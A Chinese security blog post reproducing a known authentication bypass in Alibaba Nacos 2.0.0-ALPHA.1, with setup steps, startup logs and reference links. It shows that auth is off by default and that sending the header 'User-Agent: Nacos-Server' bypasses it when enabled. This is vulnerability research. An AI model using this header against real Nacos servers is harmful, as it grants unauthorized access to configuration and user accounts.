alibaba nacos

最新推荐文章于 2024-10-08 14:40:32 发布

caiqiiqi

最新推荐文章于 2024-10-08 14:40:32 发布

阅读量2.4k

点赞数

分类专栏： java 安全 Web

本文链接：https://blog.csdn.net/caiqiiqi/article/details/112005424

版权

安全同时被 3 个专栏收录

264 篇文章 9 订阅

订阅专栏

Web

220 篇文章 7 订阅

订阅专栏

java

213 篇文章 3 订阅

订阅专栏

下载地址：

https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.zip

漏洞参考：

https://github.com/alibaba/nacos/issues/4593
https://github.com/alibaba/nacos/blob/3d97e36785f099ea99d559fae91e9d80a3b0c320/core/src/main/java/com/alibaba/nacos/core/auth/AuthFilter.java#L78
https://github.com/alibaba/nacos/blob/3d97e36785f099ea99d559fae91e9d80a3b0c320/sys/src/main/java/com/alibaba/nacos/sys/env/Constants.java#L63

安装启动方法：

cd nacos\bin
.\startup.cmd -m standalone

启动输出：

PS C:\Users\Administrator\Downloads\nacos-server-2.0.0-ALPHA.1\nacos\bin> .\startup.cmd -m standalone
"nacos is starting with standalone"

         ,--.
       ,--.'|
   ,--,:  : |                                           Nacos 2.0.0-ALPHA.1
,`--.'`|  ' :                       ,---.               Running in stand alone mode, All function modules
|   :  :  | |                      '   ,'\   .--.--.    Port: 8848
:   |   \ | :  ,--.--.     ,---.  /   /   | /  /    '   Pid: 4132
|   : '  '; | /       \   /     \.   ; ,. :|  :  /`./   Console: http://192.168.150.1:8848/nacos/index.html
'   ' ;.    ;.--.  .-. | /    / ''   | |: :|  :  ;_
|   | | \   | \__\/: . ..    ' / '   | .; : \  \    `.      https://nacos.io
'   : |  ; .' ," .--.; |'   ; :__|   :    |  `----.   \
|   | '`--'  /  /  ,.  |'   | '.'|\   \  /  /  /`--'  /
'   : |     ;  :   .'   \   :    : `----'  '--'.     /
;   |.'     |  ,     .-./\   \  /            `--'---'
'---'        `--`---'     `----'

2020-12-31 11:23:02,647 INFO Bean 'org.springframework.security.access.expression.method.DefaultMethodSecurityExpressionHandler@66c61024' of type [org.springframework.security.access.expression.method.DefaultMethodSecurityExpressionHandler] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying)

2020-12-31 11:23:02,653 INFO Bean 'methodSecurityMetadataSource' of type [org.springframework.security.access.method.DelegatingMethodSecurityMetadataSource] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying)

2020-12-31 11:23:04,338 INFO Tomcat initialized with port(s): 8848 (http)

2020-12-31 11:23:05,372 INFO Root WebApplicationContext: initialization completed in 9221 ms

2020-12-31 11:23:18,819 INFO Initializing ExecutorService 'applicationTaskExecutor'

2020-12-31 11:23:18,932 INFO Adding welcome page: class path resource [static/index.html]

2020-12-31 11:23:19,576 INFO Creating filter chain: Ant [pattern='/**'], []

2020-12-31 11:23:19,622 INFO Creating filter chain: any request, [org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter@701a32, org.springframework.security.web.context.SecurityContextPersistenceFilter@a8a8b75, org.springframework.security.web.header.HeaderWriterFilter@412c995d, org.springframework.security.web.csrf.CsrfFilter@6b9c69a9, org.springframework.security.web.authentication.logout.LogoutFilter@51e37590, org.springframework.security.web.savedrequest.RequestCacheAwareFilter@72be135f, org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter@2e647e59, org.springframework.security.web.authentication.AnonymousAuthenticationFilter@39aa45a1, org.springframework.security.web.session.SessionManagementFilter@4dd94a58, org.springframework.security.web.access.ExceptionTranslationFilter@30b9eadd]

2020-12-31 11:23:19,858 INFO Initializing ExecutorService 'taskScheduler'

2020-12-31 11:23:19,878 INFO Exposing 16 endpoint(s) beneath base path '/actuator'

2020-12-31 11:23:20,012 INFO Tomcat started on port(s): 8848 (http) with context path '/nacos'

2020-12-31 11:23:20,016 INFO Nacos Log files: C:\Users\Administrator\Downloads\nacos-server-2.0.0-ALPHA.1\nacos\logs

2020-12-31 11:23:20,016 INFO Nacos Log files: C:\Users\Administrator\Downloads\nacos-server-2.0.0-ALPHA.1\nacos\conf

2020-12-31 11:23:20,017 INFO Nacos Log files: C:\Users\Administrator\Downloads\nacos-server-2.0.0-ALPHA.1\nacos\data

2020-12-31 11:23:20,017 INFO Nacos started successfully in stand alone mode. use embedded storage

登录之后是这样的：
在这里插入图片描述

application.properties默认为false，即未开启鉴权，
在这里插入图片描述
默认可以查看用户名密码，添加用户

且添加的新用户可以直接登录：

手动修改为true之后，重新启动，
变成了403：
在这里插入图片描述

加上这个Header之后，

User-Agent: Nacos-Server

在这里插入图片描述
就绕过了认证。

skywalking参考：

http://www.itmuch.com/skywalking/dynamic-configuration/
https://skyapm.github.io/document-cn-translation-of-skywalking/zh/8.0.0/setup/backend/dynamic-config.html
https://github.com/apache/skywalking/pull/6098/commits/2f72539f7b57c9b3cf6870e5b6f6972783413900
https://github.com/apache/skywalking/pull/6098/files